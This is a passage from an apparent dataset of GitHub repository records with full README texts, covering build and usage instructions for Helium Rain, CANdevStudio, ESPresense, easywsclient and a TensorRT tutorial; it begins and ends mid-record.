screenshot](http://helium-rain.com/gallery_data/orbits.jpg)\n\n## Building Helium Rain from source\n\nWe provide these sources for our customers, and as a reference for Unreal Engine developers. **You won't be able to run the game from this repository alone**, as the game contents are not included. Building from source is only useful if you want to replace the game executable with your modifications.\n\nBuilding and modifying the source code for Helium Rain requires a few steps: getting the Unreal Engine 4 and other required tools, and building the game. We recommend you use the **release** branch of the game, but you can also keep the default **master** branch if you want to keep up with our changes.\n\n### Required dependencies\nYou will need the following tools to build Helium Rain from the sources:\n\n* Helium Rain uses UE4 as a game engine. You can get it for free at [unrealengine.com](http://unrealengine.com). You will need to sign up and download the Epic Games launcher. In the launcher library for Unreal Engine, install version 4.20.\n* [Visual Studio Community 2017](https://www.visualstudio.com/downloads/) will be used to build the sources. 
Don't forget to select the C++ development environment, since this is optional.\n* The [Windows 8.1 SDK](https://developer.microsoft.com/en-us/windows/downloads/windows-8-1-sdk) is required for Unreal Engine 4.\n* The [DirectX SDK](https://www.microsoft.com/en-us/download/details.aspx?id=6812) is required for the joystick plugin.\n* [CMake](https://cmake.org/download) is required for the joystick plugin. When prompted to add to the system PATH, please do it.\n* [TortoiseHg](https://tortoisehg.bitbucket.io/) is required for the joystick plugin.\n\n### Build process\nWe will now build the Helium Rain game executable. Follow these steps.\n\n* Open a Windows console (Windows + R ; \"cmd\" ; Enter).\n* Navigate to the *Plugins\\JoystickPlugin\\ThirdParty\\SDL2 folder* in the Helium Rain archive.\n* Run setup.bat and wait for it to complete without errors.\n* Run build.bat and wait for it to complete without errors.\n* In the Windows explorer, right-click HeliumRain.uproject and pick \"Generate Visual Studio Project Files\".\n* A HeliumRain.sln file will appear - double-click it to open Visual Studio.\n* Select the \"Shipping\" build type.\n* You can now build Helium Rain by hitting F7 or using the Build menu. This should take from 5 to 10 minutes.\n\nThe resulting binary will be generated as *Binaries\\Win64\\HeliumRain-Win64-Shipping.exe* and can replace the equivalent file in your existing game folder.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "GENIVI/CANdevStudio", "link": "https://github.com/GENIVI/CANdevStudio", "tags": ["automotive", "can", "can-bus", "genivi"], "stars": 651, "description": "Development tool for CAN bus simulation", "lang": "C++", "repo_lang": "", "readme": "# CANdevStudio \n[![CANdevStudio](https://github.com/GENIVI/CANdevStudio/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/GENIVI/CANdevStudio/actions/workflows/build.yml?query=branch%3Amaster++) [![codecov](https://codecov.io/gh/GENIVI/CANdevStudio/branch/master/graph/badge.svg)](https://codecov.io/gh/GENIVI/CANdevStudio) [![Doxygen](https://img.shields.io/badge/Doxygen-master-blue.svg)](https://genivi.github.io/CANdevStudio/)\n\n\n\n* [Overview](#overview)\n * [Compatible CAN interfaces](#compatible-can-interfaces)\n * [Supported operating systems](#supported-operating-systems)\n* [Build instructions](#build-instructions)\n * [Linux](#linux)\n * [To choose compiler](#to-choose-compiler)\n * [Qt in CMake](#qt-in-cmake)\n * [Windows](#windows)\n * [Visual Studio 2019 Win64](#visual-studio-2019-win64)\n * [macOS / OS X](#macos--os-x)\n* [Prebuilt packages](#prebuilt-packages)\n * [Download](#download)\n * [Package naming](#package-naming)\n * [Linux](#linux-1)\n * [ARCH Linux](#arch-linux)\n * [Windows](#windows-1)\n * [macOS / OS X](#macos--os-x-1)\n* [Quick Start](#quick-start)\n * [CAN Hardware](#can-hardware)\n * [Microchip CAN BUS Analyzer](#microchip-can-bus-analyzer)\n * [Lawicel CANUSB](#lawicel-canusb)\n * [PeakCAN PCAN-USB](#peakcan-pcan-usb)\n * [PassThruCAN Plugin](#passthrucan-plugin)\n * [CANdevStudio without CAN hardware](#candevstudio-without-can-hardware)\n * [VCAN](#vcan)\n * [Cannelloni](#cannelloni)\n* [Help](#help)\n * [Scripting](#scripting)\n * [CAN Signals](#can-signals)\n * [CanDevice configuration](#candevice-configuration)\n * [CanRawFilter](#canrawfilter)\n * [Adding new components](#adding-new-components)\n \n## Overview\nMost of automotive projects need to have an access to the 
Controller Area Network (CAN) bus. There are plenty of commercial frameworks that provide CAN stacks and the hardware/software tools necessary to develop proper CAN networks. They are very comprehensive and thus expensive. CANdevStudio aims to be a cost-effective replacement for CAN simulation software. It can work with a variety of CAN hardware interfaces (e.g. Microchip, Vector, PEAK-Systems) or even without one (vcan and [cannelloni](https://github.com/mguentner/cannelloni)). CANdevStudio enables every automotive developer to simulate CAN signals such as ignition status, door status or reverse gear. Thanks to its modularity, it is easy to implement new, custom features.\n\nCheck out CANdevStudio on [YouTube](https://www.youtube.com/watch?v=1TfAyg6DG04)\n\n

\n\n

\n\n### Compatible CAN interfaces\nAccess to the CAN bus is based on the Qt framework. The current list of supported CAN interfaces can be found [here](https://doc.qt.io/qt-5/qtcanbus-backends.html).\n\nThe current list of devices compatible with SocketCAN (Linux only) can be found [here](http://elinux.org/CAN_Bus).\n### Supported operating systems\n* Linux\n* Windows\n* macOS\n\n## Build instructions\nThe CANdevStudio project uses GitHub Actions as its continuous integration environment. You can check [build.yml](https://github.com/GENIVI/CANdevStudio/blob/master/.github/workflows/build.yml) for details. \n\nTo lower maintenance effort and allow for usage of modern C++ features, CANdevStudio dropped \"official\" support for legacy compilers like gcc5.3, vs2015 or MinGW as of v1.2.0. The current CI configuration uses the latest compilers available for each GitHub Actions environment:\n* ubuntu-latest (clang and gcc)\n* macos-latest (clang)\n* windows-latest (vs2019 x64)\n\n### Linux\n```\ngit clone https://github.com/GENIVI/CANdevStudio.git\ncd CANdevStudio\ngit submodule update --init --recursive\nmkdir build\ncd build\ncmake ..\nmake\n```\n#### To choose compiler\n```\ncd CANdevStudio/build\nrm -rf *\nexport CC=clang\nexport CXX=clang++\ncmake ..\nmake\n```\n#### Qt in CMake\nIf CMake fails to find Qt on your system:\n```\ncd CANdevStudio/build\nrm -rf *\ncmake .. -DCMAKE_PREFIX_PATH=/home/genivi/Qt5.12.0/5.12.0/gcc_64\nmake\n```\n### Windows\n#### Visual Studio 2019 Win64\n```\ngit clone https://github.com/GENIVI/CANdevStudio.git\ncd CANdevStudio\ngit submodule update --init --recursive\nmkdir build\ncd build\ncmake .. -DCMAKE_BUILD_TYPE=Release -G \"Visual Studio 16 2019\" -A x64\ncmake --build .\n```\n### macOS / OS X\n```\ngit clone https://github.com/GENIVI/CANdevStudio.git\ncd CANdevStudio\ngit submodule update --init --recursive\nmkdir build\ncd build\ncmake .. -GNinja -DCMAKE_PREFIX_PATH=/path/to/Qt/lib/cmake\nninja\n```\n## Prebuilt packages\nEach GitHub Actions job stores prebuilt packages for 90 days. Additionally, official releases are stored on the GitHub Releases page.\n### Package naming\n***CANdevStudio-X.Y.ZZZZZZZ-SYS[-standalone]***\n\n**X** - major version number of previous stable version
\n**Y** - minor version of previous stable version
\n**Z** - SHA commit ID
\n**SYS** - either **win64**, **Linux** or **Darwin**
\n**standalone** - bundle version that contains Qt libraries and all relevant plugins.
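\nFor example, a hypothetical standalone Linux snapshot built on top of a previous stable v1.2 release at commit 9a617bd (illustrative values) would be named:\n\n```\nCANdevStudio-1.2.9a617bd-Linux-standalone\n```\n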
\n### Linux\nAll packages are built on the ubuntu-latest environment. Refer to [this](https://github.com/actions/virtual-environments) page to determine the exact Ubuntu version. You may experience problems with missing or incompatible libraries when trying to run the package on other distros. \n\nTo run the standalone version, use the CANdevStudio.sh script.\n### ARCH Linux\nInstall AUR package: [candevstudio-git](https://aur.archlinux.org/packages/candevstudio-git/)\n\n### Windows\nPackages are built with Visual Studio 2019.\n\nThe standalone version contains Qt. Installation of VS2019 redist packages may still be required. \n### macOS / OS X\nThe package is a DMG installer.\n## Quick Start\nGeneral instructions to start your first simulation:\n1. Build the latest master or release.\n2. Run the application and start a new project\n3. Drag and drop CanDevice and CanRawView components and connect them accordingly.\n4. Double click on the CanDevice node to open its configuration window.\n 1. set one of the supported backends (e.g. socketcan) [link](http://doc.qt.io/qt-5.10/qtcanbus-backends.html).
**NOTE:** List of supported backends depends on Qt version.\n 2. set name of your can interface (e.g. can0)\n5. Start the simulation\n6. Double click on CanRawView component to see CAN traffic\n\nSteps required to use specific CAN hardware or virtual interfaces require some additional steps listed in following sections.\n### CAN Hardware\nThe list below shows hardware that has been successfully used with CANdevStudio.\n#### Microchip CAN BUS Analyzer\n* Tested on Linux\n* Requires socketcan [driver](https://github.com/rkollataj/mcba_usb).\n* Officially supported in Linux Kernel v4.12+\nConfiguration:\n1. Find your interface name (e.g. can0)
\n```ip link```\n2. Configure bitrate
\n```sudo ip link set can0 type can bitrate 1000000```\n3. Bring the device up
\n```sudo ip link set can0 up```\n4. Optionally configure CAN termination\n 1. In GitHub based driver
\n ```sudo ip link set can0 type can termination 1```\n 2. In Linux 4.12+ driver
\n ```sudo ip link set can0 type can termination 120```\n\nCanDevice backend: socketcan\n\n#### Lawicel CANUSB\n* Tested on Linux\n* Based on FTDI Serial driver\n* Requires slcand to \"convert\" serial device to SocketCAN.\n* Officially supported in Linux Kernel v2.6.38\n\nConfiguration:\n1. Create SocketCAN device from serial interface
\n```sudo slcand -o -c -s8 -S1000000 /dev/ttyUSB0 can0```\n2. Bring the device up
\n```sudo ip link set can0 up```\n\nCanDevice backend: socketcan\n\n#### PeakCAN PCAN-USB\n* Tested on Windows\n\nCanDevice settings example:\n```\nbackend: peakcan\ninterface: usb0\nconfiguration: BitRateKey = 250000\n```\n#### PassThruCAN Plugin\n* Tested on Windows\n\nCanDevice settings example for PEAK-PCAN:\n```\nbackend: passthrucan\nconfiguration: BitRateKey = 250000\ninterface: PCANPT32\n```\nCanDevice settings example for SIE_CANUSB:\n```\nbackend: passthrucan\nconfiguration: BitRateKey = 250000\ninterface: CANUSB\n```\nCanDevice settings example for Kvaser USBcan:\n```\nbackend: passthrucan\nconfiguration: BitRateKey = 250000\ninterface: J2534 (kline) for Kvaser Hardware\n```\n### CANdevStudio without CAN hardware\nCANdevStudio can be used without actual CAN hardware thanks to Linux's built-in emulation.\n#### VCAN\nConfiguration:\n```\nsudo modprobe vcan\nsudo ip link add dev can0 type vcan\nsudo ip link set can0 up\n```\nCanDevice backend: socketcan\n#### Cannelloni\nA SocketCAN over Ethernet tunnel. Available for Linux only.\n\nLet's consider setup as before:\n

\n\n

\n\n##### Configuration with qtCannelloniCanBusPlugin\nTarget configuration:\n```\nsudo modprobe vcan\nsudo ip link add dev can0 type vcan\nsudo ip link set can0 up\ncannelloni -I can0 -R 192.168.0.1 -r 30000 -l 20000\n```\nPC configuration:\n\n1. Install libqtCannelloniCanBusPlugin.so that is built along with CANdevStudio. You can either copy it manually to the Qt plugins directory (e.g. /usr/lib/qt/plugins/canbus) or use \"make install\" to do it automatically.\n2. Create a new project in CANdevStudio and add a CanDevice node\n3. Configure CanDevice:\n 1. backend: cannelloni\n 2. interface: 30000,192.168.0.2,20000 (local_port,remote_ip,remote_port)\n4. Start simulation\n\n##### Configuration without qtCannelloniCanBusPlugin\nTarget configuration:\n```\nsudo modprobe vcan\nsudo ip link add dev can0 type vcan\nsudo ip link set can0 up\ncannelloni -I can0 -R 192.168.0.1 -r 30000 -l 20000\n```\nPC configuration:\n1. Execute the following lines in a shell\n```\nsudo modprobe vcan\nsudo ip link add dev can0 type vcan\nsudo ip link set can0 up\ncannelloni -I can0 -R 192.168.0.2 -r 20000 -l 30000\n```\n2. Create a new project in CANdevStudio and add a CanDevice node\n3. Configure CanDevice:\n 1. backend: socketcan\n 2. interface: can0\n4. Start simulation\n\n## Help\n### Scripting\nAs of v1.1 CANdevStudio supports the creation of [QML](https://doc.qt.io/qt-5/qmlapplications.html) based scripts. Scripts can be developed and loaded dynamically without a need to restart the main application. Scripting adds a lot of different possibilities to CANdevStudio that include:\n* Creation of custom GUIs\n* Raw frames and signals handling\n* Time triggered actions\n* Message triggered actions\n* ... and many more, as all QML functionalities are supported.\n\nTry it yourself by loading one of the [examples](https://github.com/GENIVI/CANdevStudio/tree/master/src/components/qmlexecutor/examples) into the QMLExecutor component. You are welcome to share your scripts via Pull Requests!\n\n### CAN Signals\nCANdevStudio provides support for CAN signal handling. The [DBC](http://socialledge.com/sjsu/index.php/DBC_Format) database description format is supported. Reverse engineered DBC files can be found in the [opendbc](https://github.com/commaai/opendbc) project.\n\nSupport for other CAN database formats can be added via an extension of [CANdb](https://www.github.com/GENIVI/CANdb).\n\n#### Sending signals\n1. Start a new project and set up CanDevice as described in the quick start section\n2. **Add CanSignalData** component that serves as a CAN signals database for other components. You may have multiple CanSignalData components per project\n3. Open CanSignalData properties and configure the path to the DBC file\n4. The list of messages and signals shall now be loaded and visible in the CanSignalData window\n5. You may configure cycle and initial value per each message\n6. **Add CanSignalEncoder** component and connect it with CanDevice. CanSignalEncoder acts as a translator between signals and CAN frames. It is also responsible for sending cyclical messages.\n7. CanSignalEncoder has been automatically configured to use the previously added CAN database. The CAN database can be manually selected in component properties (this applies to all components from the \"Signals\" group)\n8. **Add CanSignalSender** component and connect it with CanSignalEncoder\n9. Add signals in the CanSignalSender window\n10. Start simulation\n11. CanSignalEncoder will start sending cyclical messages\n12. 
You can send previously configured signals from CanSignalSender:\n * if a signal is part of a periodic message, its value will be updated in the next cycle\n * if a signal is not part of a periodic message, it will be sent out immediately\n\n#### Receiving signals\n1. Start a new project and set up CanDevice as described in the quick start section\n2. **Add CanSignalData** component that serves as a CAN signals database for other components. You may have multiple CanSignalData components per project\n3. Open CanSignalData properties and configure the path to the DBC file\n4. The list of messages and signals shall now be loaded and visible in the CanSignalData window\n5. **Add CanSignalDecoder** component and connect it with CanDevice. CanSignalDecoder acts as a translator between signals and CAN frames.\n6. CanSignalDecoder has been automatically configured to use the previously added CAN database. The CAN database can be manually selected in component properties (this applies to all components from the \"Signals\" group)\n7. **Add CanSignalViewer** component and connect it with CanSignalDecoder\n8. Start simulation\n9. Signals shall now appear in CanSignalViewer. Note that CanSignalDecoder sends over only signals whose values have changed.\n\n### CanDevice configuration\nThe CanDevice component can be configured using the \"configuration\" property:\n* Format - \"key1=value1;key2=value2;keyX=valueX\"\n* Key names are case sensitive, values are case insensitive\n* Configuration keys are taken from the [ConfigurationKey enum](https://doc.qt.io/qt-5/qcanbusdevice.html#ConfigurationKey-enum). \n* RawFilterKey and ErrorFilterKey are currently not supported\n* Whitespaces are ignored\n\nE.g.\n```\nBitRateKey=100000;ReceiveOwnKey=false;LoopbackKey=true\n```\n### CanRawFilter\nThe CanRawFilter component enables you to filter (i.e. accept or drop) incoming and outgoing frames:\n* [Qt](https://doc.qt.io/qt-5/qregularexpression.html) regular expressions are used to match filter rules.\n* Rules are matched from top to bottom\n* A default policy is applied to frames unmatched by any filter\n\nExamples:\n* match 0x222 and 0x333 frames only [id field]\n```\n222|333\n```\n* match 0x200 - 0x300 frames only [id field]\n```\n^[23]..$\n```\n* match empty payload (DLC 0) [payload field]\n```\n^$\n```\n* match 2 byte payload (DLC 2) [payload field]\n```\n^.{4}$\n```\n### Adding new components\n1. Configure the build to include the *templategen* tool\n```\ncd build\ncmake .. -DWITH_TOOLS=ON\nmake\n```\n2. Generate the component (use -g option if you don't need component to have GUI)\n```\n./tools/templategen/templategen -n MyNewComponent -o ../src/components -g\n```\n3. The CMake script automatically detects new components; it has to be re-invoked manually.\n```\ncmake ..\n```\n4. Build project \n``` \nmake\n```\n5. Your component is now integrated with CANdevStudio\n6. You may want to modify *src/components/mynewcomponent/mynewcomponentplugin.h* to configure section name, color and spacing\n7. Define component inputs and outputs in *src/components/mynewcomponent/mynewcomponentmodel.cpp*. Look for examples in other components.\n8. 
Modify the automatically generated unit tests in *src/components/mynewcomponent/tests*\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ESPresense/ESPresense", "link": "https://github.com/ESPresense/ESPresense", "tags": ["esp32", "esp32-arduino", "mqtt", "home-assistant", "homeassistant", "home-automation", "iot", "hacktoberfest", "m5stickc", "m5atom", "m5atom-lite", "m5atom-matrix", "m5stickcplus", "indoor-positioning"], "stars": 650, "description": "An ESP32 based presence detection node for use with the Home Assistant mqtt_room component for localized device presence detection.", "lang": "C++", "repo_lang": "", "readme": "# ESPresense\n\n![GitHub release (latest by date)](https://img.shields.io/github/v/release/ESPresense/ESPresense)\n![GitHub all releases](https://img.shields.io/github/downloads/ESPresense/ESPresense/total)\n[![.github/workflows/main.yml](https://github.com/ESPresense/ESPresense/actions/workflows/build.yml/badge.svg)](https://github.com/ESPresense/ESPresense/actions/workflows/build.yml)\n\n\nAn ESP32 based presence detection node for use with the [Home Assistant](https://www.home-assistant.io/) [`mqtt_room` component](https://www.home-assistant.io/components/sensor.mqtt_room/) for localized device presence detection.\n\n**Documentation:** https://espresense.com/\n\n**Building:** [building](./BUILDING.md).\n\n**Release Notes:** [changelog](./CHANGELOG.md).\n", "readme_type": "markdown", "hn_comments": "Development environments, Arduino compatible bare metal, NuttX and CircuitPython.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dhbaird/easywsclient", "link": "https://github.com/dhbaird/easywsclient", "tags": [], "stars": 649, "description": "A short and sweet WebSocket client for C++", "lang": "C++", "repo_lang": "", "readme": "easywsclient\n============\n\nEasywsclient is an easy and powerful WebSocket client to get your\nC++ code connected to a web stack right away. It depends only on the\nstandard libraries. It is compatible with modern C++11 std::function and\n[lambda](http://en.wikipedia.org/wiki/Anonymous_function#C.2B.2B),\nif they're available (they're not required though). [RFC\n6455](http://tools.ietf.org/html/rfc6455) Version 13 WebSocket is\nsupported. Version 13 is compatible with all major, modern WebSocket\nimplementations, including Node.js, and has been a standard since\nDecember 2011.\n\nRationale: This library is intended to help a C++ project start using\nWebSocket rapidly. This small library can easily be thrown into an\nexisting project. For complicated builds that you can't figure out right\naway, you can even cheat by piggy-backing the .cpp file into one of\nthe project's existing files. Yes, WebSocket is awesome enough to\nwarrant getting it integrated into your project! This project imposes\nno special interface requirements, and can work happily with new C++11\nfeatures or with older C++ projects.\n\nAs an additional benefit, easywsclient is very simple, with just a single\nimplementation file. It can serve as a cruft-free concise reference. You\nare most welcome to use this code as a reference for creating alternative\nimplementations that may better suit your needs.\n\nNews\n====\n\n*2014-12-06*\nBinary frames now supported. Closes issue #38. Automated integration testing\nis now supported by running `make test`. 
The test suite expects GoogleTest to\nbe installed at `/usr/src/gtest` (`apt-get install libgtest-dev` does the\ntrick). The test suite uses C++14 (for lambda capture expressions), and thus it\nwill not work on older compilers. Note that easywsclient itself is still\nrestricted to C++98/C++03, and will continue to build with older compilers.\n\n\n\nUsage\n=====\n\nThe WebSocket class interface looks like this:\n\n```c++\n// Factory method to create a WebSocket:\nstatic pointer from_url(std::string url);\n// Factory method to create a dummy WebSocket (all operations are noop):\nstatic pointer create_dummy();\n\n// Function to perform actual network send()/recv() I/O:\n// (note: if all you need is to recv()/dispatch() messages, then a\n// negative timeout can be used to block until a message arrives.\n// By default, when timeout is 0, poll() will not block at all.)\nvoid poll(int timeout = 0); // timeout in milliseconds\n\n// Receive a message, and pass it to callable(). Really, this just looks at\n// a buffer (filled up by poll()) and decodes any messages in the buffer.\n// Callable must have signature: void(const std::string & message).\n// Should work with C functions, C++ functors, and C++11 std::function and\n// lambda:\ntemplate<class Callable>\nvoid dispatch(Callable callable);\n\n// Sends a TEXT type message (gets put into a buffer for poll() to send\n// later):\nvoid send(std::string message);\n\n// Close the WebSocket (send a CLOSE message over WebSocket, then close() the\n// actual socket when the send buffer becomes empty):\nvoid close();\n```\n\nPut together, the usage looks like this:\n\n```c++\n#include \"easywsclient.hpp\"\n//#include \"easywsclient.cpp\" // <-- include only if you don't want to compile separately\n\nint\nmain()\n{\n ...\n using easywsclient::WebSocket;\n WebSocket::pointer ws = WebSocket::from_url(\"ws://localhost:8126/foo\");\n assert(ws);\n while (true) {\n ws->poll();\n ws->send(\"hello\");\n ws->dispatch(handle_message);\n // ...do more stuff...\n }\n ...\n delete ws; // alternatively, use unique_ptr<> if you have C++11\n return 0;\n}\n```\n\nExample\n=======\n\n # Launch a test server:\n node example-server.js\n\n # Build and launch the client:\n g++ -c easywsclient.cpp -o easywsclient.o\n g++ -c example-client.cpp -o example-client.o\n g++ example-client.o easywsclient.o -o example-client\n ./example-client\n\n # ...or build and launch a C++11 client:\n g++ -std=gnu++0x -c easywsclient.cpp -o easywsclient.o\n g++ -std=gnu++0x -c example-client-cpp11.cpp -o example-client-cpp11.o\n g++ example-client-cpp11.o easywsclient.o -o example-client-cpp11\n ./example-client-cpp11\n\n # Expect the output from example-client:\n Connected to: ws://localhost:8126/foo\n >>> galaxy\n >>> world\n\nThreading\n=========\n\nThis library is not thread safe. The user must take care to use locks if\naccessing an instance of `WebSocket` from multiple threads. 
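\nA minimal sketch of such locking (hypothetical helper functions, not part of the library itself - it assumes C++11 and the `ws` pointer from the usage example above):\n\n```c++\n#include <mutex>\n#include <string>\n\n#include \"easywsclient.hpp\"\n\nstd::mutex ws_mutex; // guards every poll()/send()/dispatch() on the shared instance\n\nvoid send_locked(easywsclient::WebSocket::pointer ws, const std::string & message)\n{\n    std::lock_guard<std::mutex> lock(ws_mutex);\n    ws->send(message);\n}\n\nvoid poll_locked(easywsclient::WebSocket::pointer ws)\n{\n    std::lock_guard<std::mutex> lock(ws_mutex);\n    ws->poll();\n    ws->dispatch([](const std::string & message) {\n        // handle the incoming message (still holding the lock)\n    });\n}\n```\n\n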
If you need\na quick threading library and don't have Boost or something else already,\nI recommend [TinyThread++](http://tinythreadpp.bitsnbites.eu/).\n\nFuture Work\n===========\n\n(contributions appreciated!)\n\n* Parameterize the `pointer` type (especially for `shared_ptr`).\n* Support optional integration on top of an async (event-driven) library,\n especially Asio.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "LitLeo/TensorRT_Tutorial", "link": "https://github.com/LitLeo/TensorRT_Tutorial", "tags": [], "stars": 649, "description": null, "lang": "C++", "repo_lang": "", "readme": "# It is recommended to watch the latest video version! The list is as follows\n - [\"TensorRT Tutorial (1) How to choose the TensorRT version\"][21]\n - [\"TensorRT Tutorial (2) Compile TensorRT's open source source code\"][22]\n - [\"TensorRT Tutorial (3.1) Explains TensorRT Documentation - Basic Use\"][23]\n - [\"TensorRT Tutorial (3.2) Explains TensorRT Documentation - Code Samples TRT Can Use for Reference\"][24]\n - [\"TensorRT Tutorial (3.3.1) plugin examples and principles\"][25]\n - [\"TensorRT Tutorial (3.3.2) How to Build Your Own Plugin Library\"][26]\n - [\"TensorRT plugin 16 Acceleration Experience\"][27]\n\n - For details on the video version, see the video version information section in the catalog\n\n## Progress log\n - 2017-04-27 The project was initiated and the GitHub repository was created.\n - 2017-09-30 TensorRT 3 was released recently; let's sort out the current resources.\n - 2017-10-18 Added blog - using TensorRT to implement a leaky relu layer\n - 2017-11-11 Resources: Added google's INT8 open source library\n - 2017-11-25 Added blog - Introduction to the usage of TensorRT Plugin, taking the leaky relu layer as an example\n - 2020-8-31 Added blog \"Introduction to TensorRT Github Open Source Part\"\n - 2020-9-7 Added blog \"Summary of TensorRT Can Learn from Code\"\n - 2022-11-2 Added blog \"Comprehensive Summary of Conformer Encoder GPU Acceleration Strategies\"\n - 2022-11-2 Added blog \"Comparison of Several Ways of TensorRT Conversion Model\"\n\n----\n\n## Resource organization\n - [TensorRT 3 RC][1] and [TensorRT 2.1][2] download links\n - [TensorRT 2.1 Official Online Documentation][3]\n - NVIDIA's blog introducing TensorRT - [Deploying Deep Neural Networks with NVIDIA TensorRT][4]\n - The GTC 2017 [PPT][5] and [Video][6] introducing TensorRT, including the implementation principles of INT8 Quantization and Calibration.\n - Added an INT8 [demo][7] for cublas and cudnn\n - Added my PPT on the topic of NVIDIA INT8 at GTC China 2017 Community Corner, [GTC-China-2017-NVIDIA-INT8.pdf][8]\n - Added google's INT8 open source library [gemmlowp][9], which currently supports ARM and CPU optimization\n - The \"TensorRT Series\" blog written by the \"ZizhizhiGPGPU\" public account, published by NVIDIA engineers, running from the introductory article to the INT8 article to the FP16 article and finally to the Custom Layer article; the content is logical and full of solid material - I can only admire it. Attached are the four blog links: [Introduction to TensorRT series][10], [INT8 of TensorRT series][11], [FP16 of TensorRT series][12], [Custom Layer of TensorRT series][13].\n - [\"Practical combat of high-performance deep learning support engine - TensorRT\"][14], main content: 1. Introduction to TensorRT theory: a basic introduction to what TensorRT is, what optimizations it makes, and why TensorRT is needed on top of a framework's optimization engine. 2. 
TensorRT high-level introduction: for advanced users, how to deal with network layers that are not supported by TensorRT;\n\n---\n## blog\n - [Using TensorRT to implement leaky relu layer][15]\n - [Introduction to the usage of TensorRT Plugin - taking the leaky relu layer as an example][16]\n\n# TensorRT_Tutorial\n\nTensorRT, a C++ library released by NVIDIA, enables a high-performance inference process. Recently, NVIDIA released the TensorRT 2.0 Early Access version. The major change is support for the INT8 type. In today's era of popular deep learning, INT8 has great advantages in reducing the size of the model and speeding up computation. Google's newly released TPU uses an 8-bit data type.\n\nI am currently using TensorRT to explore INT8. I have already been tripped up once by TensorRT's imperfect documentation. So I want to do a TensorRT Tutorial on my own, which mainly includes three parts:\n - TensorRT User Guide translation;\n - Introduction and analysis of TensorRT samples;\n - Experience with TensorRT.\n\n Thanks to everyone who contributed to this translation project.\n \n Content source:\n TensorRT download page:\n https://dedeveloper.nvidia.com/nvidia-tensorrt-20-download\n \n TensorRT Documentation, Samples\n In the corresponding directory after installation\n \n## Participants (ordered by participation time)\nTensorRT User Guide translation\n - [Lit Leo][18]\n - [Moyan Zitto][19]\n\nTranslation proofreading\n\n - Zhao Kaiyong\n\nTensorRT samples introduction, analysis and explanation\n - [Lit Leo][20]\n\nExperience with TensorRT.\n\nIf you want to participate, please join the QQ group: 483063470\n\nSupport donation projects\n\n \n\n## Recruiting interns\n[Internship] [Tencent Beijing AILAB] Recruiting AI Heterogeneous Acceleration Interns\nSend your resume directly to the person in charge; a quick response is guaranteed.\nBasic conditions: familiar with C++, at least 6 months of internship\nWork content:\n1. Use C++ to reproduce models trained by the framework and perform CPU, GPU, and ARM acceleration to meet the performance requirements for launch.\n2. Research various inference frameworks and put them into production\nBonus:\n1. Have written or maintained deep learning framework code;\n2. Know how to develop CUDA, write kernels yourself, and know how to use cublas, cudnn and other libraries;\n3. Linux CPU C++ programming ability; can write AVX; can use MKL;\n4. Familiar with the deep learning calculation process\n5. 
Strong learning ability and plenty of hands-on practice\nContact: leowgyang@tencent.com\n\n [1]: https://developer.nvidia.com/nvidia-tensorrt3rc-download\n [2]: https://developer.nvidia.com/nvidia-tensorrt-download\n [3]: http://docs.nvidia.com/deeplearning/sdk/tensorrt-user-guide/index.html\n [4]: https://devblogs.nvidia.com/parallelforall/deploying-deep-learning-nvidia-tensorrt/\n [5]: http://on-demand.gputechconf.com/gtc/2017/presentation/s7310-8-bit-inference-with-tensorrt.pdf\n [6]: http://on-demand.gputechconf.com/gtc/2017/video/s7310-szymon-migacz-8-bit-inference-with-tensorrt.mp4\n [7]: https://github.com/LitLeo/TensorRT_Tutorial/tree/master/cublas&cudnn_int8_demo\n [8]: https://github.com/LitLeo/TensorRT_Tutorial/blob/master/GTC-China-2017-NVIDIA-INT8.pdf\n [9]: https://github.com/google/gemmlowp\n [10]: https://mp.weixin.qq.com/s/E5qbMsuc7UBnNmYBzq__5Q\n [11]: https://mp.weixin.qq.com/s/wyqxUlXxgA9Eaxf0AlAVzg\n [12]: https://mp.weixin.qq.com/s/nuEVZlS6JfqRQo30S0W-Ww?scene=25#wechat_redirect\n [13]: https://mp.weixin.qq.com/s/xabDoauJc16z3-gpyre8zA\n [14]: https://mp.weixin.qq.com/s/F_VvLTWfg-COZKrQAtOSwg\n [15]: https://github.com/LitLeo/TensorRT_Tutorial/blob/master/blogs/%E4%BD%BF%E7%94%A8TensorRT%E5%AE%9E%E7%8E%B0leaky%20relu%E5%B1%82.md\n [16]: https://github.com/LitLeo/TensorRT_Tutorial/blob/master/blogs/TensorRT%20Plugin%E4%BD%BF%E7%94%A8%E6%96%B9%E5%BC%8F%E7%AE%80%E4%BB%8B-%E4%BB%A5leaky%20relu%E5%B1%82%E4%B8%BA%E4%BE%8B.md\n [17]: https://github.com/LitLeo/TensorRT_Tutorial/blob/master/Bug.md\n [18]: https://github.com/LitLeo\n [19]: https://github.com/MoyanZitto\n [20]: https://github.com/LitLeo\n [21]: https://www.bilibili.com/video/BV1Nf4y1v7sa/\n [22]: https://www.bilibili.com/video/BV1x5411n76K/\n [23]: https://www.bilibili.com/video/BV19V411t7LV/\n [24]: https://www.bilibili.com/video/BV1DT4y1A7Rx/\n [25]: https://www.bilibili.com/video/BV1op4y1p7bj/\n [26]: https://www.bilibili.com/video/BV1Qi4y1N7YS/\n [27]: https://www.bilibili.com/video/BV19Y411g7YY/", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ossrs/state-threads", "link": "https://github.com/ossrs/state-threads", "tags": ["srs", "coroutines", "greenlet", "fiber", "networking", "server-side", "state-threads", "c", "concurrency", "async", "asyncio", "library"], "stars": 648, "description": "Lightweight thread library for C/C++ coroutine (similar to goroutine), for high performance network servers.", "lang": "C++", "repo_lang": "", "readme": "# 